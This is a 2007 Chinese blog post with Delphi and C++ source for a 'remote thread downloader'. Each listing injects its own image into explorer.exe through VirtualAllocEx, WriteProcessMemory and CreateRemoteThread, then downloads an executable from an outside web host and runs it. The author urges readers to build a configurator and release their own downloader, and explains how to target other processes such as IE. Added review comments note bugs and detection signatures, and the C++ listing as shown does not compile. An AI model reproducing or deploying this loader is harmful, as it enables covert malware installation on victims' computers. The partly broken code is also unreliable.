Delphi线程注入下载
2007-03-11 01:06

Delphi线程注入下载
很久以前就听说远程线程注入方法很好，不用另外写 DLL，但是实现难度高。
刚好拿到一份 Aphex 大哥的远程线程注入代码演示。

代码:
感谢 Aphex 大哥提供 Delphi 版本的远程线程注入方法。
{
Remote Thread Downloader By Anskya
Email:Anskya@Gmail.com
Web:www.Anskya.Net
}
program Project1;

{$IMAGEBASE $13140000}

uses
Windows,Urlmon;

// Payload. This routine is what Inject hands to CreateRemoteThread, so it runs as a
// new thread inside the target process: it fetches a remote executable over plain
// HTTP and launches it. dwEntryPoint receives the image base that Inject passes as
// the thread parameter; it is not used.
// NOTE(review): as pasted the drop path is 'c:test.exe' (no backslash). Delphi string
// literals have no escape sequences, so the blog rendering most likely stripped a '\'
// — compare the C++ listing below, which writes "c:\test.exe".
// NOTE(review): this calls ExitProcess, not ExitThread. ExitProcess terminates the
// whole host process (explorer.exe when targeted via Shell_TrayWnd), not just this
// thread; the C++ version below uses ExitThread. The 'Result := 0' after it is
// unreachable.
function Main(dwEntryPoint: Pointer): longword; stdcall;
begin
URLDownloadToFile(0, 'Http://Www.Anskya.Net/test.exe', 'c:test.exe', 0, 0); // no TLS, no integrity check; the HRESULT is ignored
WinExec('c:test.exe', SW_SHOW); // executed whether or not the download above succeeded
ExitProcess(0);
Result := 0;
end;

// Copies this program's own loaded image into the target process at the SAME virtual
// address it occupies here, then starts EntryPoint there as a remote thread. The copy
// is byte-for-byte, so absolute addresses inside it (including the import table that
// the loader already resolved in this process) only stay meaningful if the target can
// map the image at the same base — hence the fixed {$IMAGEBASE} directive at the top
// of the file and the VirtualFreeEx/VirtualAllocEx pair below.
// ProcessHandle: handle to the target, opened with PROCESS_ALL_ACCESS by the caller.
// EntryPoint:    routine inside this image to run in the target (Main).
// No return value; none of the Win32 calls below have their results checked.
// Detection note: OpenProcess -> VirtualAllocEx(PAGE_EXECUTE_READWRITE) ->
// WriteProcessMemory -> CreateRemoteThread is the classic injection sequence, and the
// copied region is never registered with the target's loader (no LoadLibrary), so it
// should appear as executable memory that is not backed by any module.
procedure Inject(ProcessHandle: longword; EntryPoint: pointer);
var
Module, NewModule: Pointer;
Size, BytesWritten, TID: longword;
begin
Module := Pointer(GetModuleHandle(nil)); // base address of our own EXE in this process
// SizeOfImage from our own PE optional header: base + e_lfanew skips the DOS stub to
// the NT headers, SizeOf(dword) skips the 'PE\0\0' signature, SizeOf(TImageFileHeader)
// lands on the optional header.
Size := PImageOptionalHeader(Pointer(integer(Module) + PImageDosHeader(Module)._lfanew + SizeOf(dword) + SizeOf(TImageFileHeader))).SizeOfImage;
// Best-effort attempt to vacate our base address in the target. Result ignored; if
// this and the allocation below both fail, NewModule is nil, the write fails, and the
// thread created below starts at an address in the target that does not hold this code.
VirtualFreeEx(ProcessHandle, Module, 0, MEM_RELEASE);
NewModule := VirtualAllocEx(ProcessHandle, Module, Size, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE); // RWX, at the same base
WriteProcessMemory(ProcessHandle, NewModule, Module, Size, BytesWritten); // whole image, headers included
// EntryPoint is an address in THIS process; it is valid in the target only because the
// base matches. Module is passed as the thread parameter. The returned thread handle
// is discarded (never closed); only the thread id is stored in TID.
CreateRemoteThread(ProcessHandle, nil, 0, EntryPoint, Module, 0, TID);
end;

// Program entry: locate explorer.exe through its taskbar window and inject into it.
var
ProcessHandle, PID: longword;

begin
// 'Shell_TrayWnd' is the taskbar window class owned by explorer.exe; its owner PID is
// the target. Neither FindWindow nor GetWindowThreadProcessId is checked: if the window
// is absent, PID keeps its zero initial value and OpenProcess below returns 0.
GetWindowThreadProcessId(FindWindow('Shell_TrayWnd', nil), @PID);
ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, PID); // full access requested; failure (0 handle) is not detected
Inject(ProcessHandle, @Main); // a 0 handle is passed through unchecked
CloseHandle(ProcessHandle); // closes the PROCESS handle (original comment said "thread handle"); the remote thread's handle is leaked inside Inject
end.


C++ 代码是完全从 Delphi 翻译过来的：代码先用 Delphi 写好，然后再翻译成 C++。

代码:
没有别的要注意的，就是请注意大小写——这是习惯了 Delphi 之后再用 C++ 最痛苦的事情。
/*
Remote Thread Downloader By Anskya
Email:Anskya@Gmail.com
Web:www.Anskya.Net
*/
#pragma comment(linker,"/ENTRY:Entrypoint /FILEALIGN:0x200 /MERGE:.data=.text /MERGE:.rdata=.text /SECTION:.text,EWR /IGNORE:4078")
#pragma comment(lib, "msvcrt.lib")
#pragma comment(lib, "urlmon.lib")

#include <windows.h>

// Payload thread started inside the target by CreateRemoteThread (see Entrypoint):
// downloads an executable over plain HTTP and runs it. The void* parameter is the
// image base passed as the thread argument and is unused.
// NOTE(review): in a C string literal "\t" is a TAB, so as written the path is
// "c:<TAB>est.exe", not "c:\test.exe"; the source presumably had a doubled backslash
// that the blog rendering collapsed. Both return values are ignored, so WinExec runs
// regardless of whether the download succeeded. ExitThread ends only this thread
// (unlike ExitProcess in the Delphi listing above); 'return 0' is unreachable.
unsigned long inject (void *)
{
URLDownloadToFile(0, "Http://Www.Anskya.Net/test.exe", "c:\test.exe", 0, 0);
WinExec("c:\test.exe", SW_SHOW);
ExitThread(0);
return 0;
}

// Custom entry point (the /ENTRY:Entrypoint linker pragma above bypasses the CRT
// startup). Mirrors the Delphi Inject + main block: finds explorer.exe via its
// taskbar window, copies this image to the same base address in that process and
// starts `inject` there as a remote thread.
// NOTE(review): as pasted this does not compile — `window`, `pidwin` and `m2` are
// used but the declared names are `windowhe`, `PID` and `heart`. Left as-is: this
// listing documents the technique; it is not a build-ready fix.
// NOTE(review): no Win32 result is checked anywhere in this function.
void Entrypoint()
{
DWORD Size;
PBYTE module;
module = (PBYTE)GetModuleHandle(0); // base address of our own image
Size = ((PIMAGE_NT_HEADERS)(module+((PIMAGE_DOS_HEADER)module)->e_lfanew))->OptionalHeader.SizeOfImage; // SizeOfImage from our PE optional header
HWND windowhe;
HANDLE ProcessHandle;
DWORD PID;
LPVOID heart;
window = FindWindow("Shell_TrayWnd", NULL); // taskbar window class -> owned by Explorer.exe (`window` is undeclared, see note)
GetWindowThreadProcessId(window, &PID);
ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pidwin); // `pidwin` undeclared; presumably PID
VirtualFreeEx(ProcessHandle, module, 0, MEM_RELEASE); // best-effort attempt to vacate our base address in the target
heart = VirtualAllocEx(ProcessHandle, module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); // RWX at the same base
WriteProcessMemory(ProcessHandle, m2, module, Size, NULL); // `m2` undeclared; presumably heart. Copies the whole image, headers included
CreateRemoteThread(ProcessHandle, 0, 0, (unsigned long(__stdcall *)(void *))inject, module, 0, NULL); // local address of inject; valid in the target only because the base matches. Thread handle is discarded
}


大家写个配置器然后就可以发布自己的 Downloader 了。如果想插入 IE 等进程：有窗口的就用 WindowSPY 查找窗口类名，然后获取 PID；
没有的话就自己写一个进程 PID 查找函数。
注意：OpenProcess → VirtualAllocEx(RWX) → WriteProcessMemory → CreateRemoteThread 这一序列是最常见的注入行为特征，现代杀毒软件/EDR 通常会对其告警。
~~~~~~~~~~~~~~The_End~~~~~~~~~~~~~~~~转载请保留版权By Anskya

program fwb;
{$IMAGEBASE $13140000}
uses
Windows;

// Download source and drop location, both fixed at compile time.
const
urls='http://www.Anskya.net/test.exe'; // plain HTTP; nothing verifies what is fetched
files='c:\ss.exe'; // note the backslash survived here, unlike the first listing's 'c:test.exe'

// Payload started inside the target by CreateRemoteThread. Differs from the first
// listing in three ways: urlmon.dll is loaded at run time instead of through the
// Urlmon unit, URLDownloadToFileA is reached via inline asm, and the thread ends with
// ExitThread rather than ExitProcess.
// NOTE(review): stdcall pushes arguments right to left, so
// URLDownloadToFileA(pCaller, szURL, szFileName, dwReserved, lpfnCB) would be
// push 0 (lpfnCB); push 0 (dwReserved); push files; push urls; push 0 (pCaller).
// The order written below (0, urls, files, 0, 0) appears to hand NULL as szURL and
// urls as dwReserved — confirm against a disassembly before trusting this listing.
// NOTE(review): declared without a parameter but CreateRemoteThread invokes it with
// one (Module); the stdcall mismatch is moot only because ExitThread never returns.
// The uses clause names only Windows, so where URLDownloadToFileA is declared for
// the `call` is not visible in this file.
procedure Main; stdcall;
begin
LoadLibrary('urlmon.dll'); // makes sure urlmon is mapped in the target; result unchecked
asm
   push 0
   push urls
   push files
   push 0
   push 0
   call URLDownloadToFileA
end;
WinExec(files,5);//SW_SHOW — runs regardless of the download outcome
ExitThread(0);
end;

// Same routine as Inject in the first listing: copies our own loaded image into the
// target at the SAME base address it has here (the fixed {$IMAGEBASE} above makes the
// copy's absolute addresses and resolved imports line up) and starts EntryPoint there.
// ProcessHandle: target handle opened with PROCESS_ALL_ACCESS. EntryPoint: Main.
// No result is checked; the remote thread's handle is discarded, only its id is kept.
// Detection note: OpenProcess -> VirtualAllocEx(RWX) -> WriteProcessMemory ->
// CreateRemoteThread is the classic injection sequence; the copy is never registered
// with the target's loader.
procedure Inject(ProcessHandle: longword; EntryPoint: pointer);
var
Module, NewModule: Pointer;
Size, BytesWritten, TID: longword;
begin
Module := Pointer(GetModuleHandle(nil)); // our own image base
// SizeOfImage from the PE optional header: e_lfanew -> NT headers, +4 skips 'PE\0\0',
// + TImageFileHeader reaches the optional header.
Size := PImageOptionalHeader(Pointer(integer(Module) + PImageDosHeader(Module)._lfanew + SizeOf(dword) + SizeOf(TImageFileHeader))).SizeOfImage;
VirtualFreeEx(ProcessHandle, Module, 0, MEM_RELEASE); // best-effort: vacate our base address in the target
NewModule := VirtualAllocEx(ProcessHandle, Module, Size, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE); // nil on failure, not checked
WriteProcessMemory(ProcessHandle, NewModule, Module, Size, BytesWritten); // whole image, headers included
CreateRemoteThread(ProcessHandle, nil, 0, EntryPoint, Module, 0, TID); // EntryPoint is a local address, valid remotely only because the base matches
end;

// Program entry: find explorer.exe via its taskbar window class and inject into it.
var
ProcessHandle, PID: longword;

begin
// 'shell_traywnd' (same class as the first listing, different case) belongs to
// explorer.exe. Nothing is checked: a missing window leaves PID at its zero initial
// value, OpenProcess then returns 0 and that 0 handle is passed straight to Inject.
GetWindowThreadProcessId(FindWindow('shell_traywnd', nil), @PID);
ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, PID);
Inject(ProcessHandle, @Main);
CloseHandle(ProcessHandle); // closes the process handle; the remote thread handle is leaked inside Inject
end.


网友评论:
1
2007-09-14 17:26 | 回复
3Q
 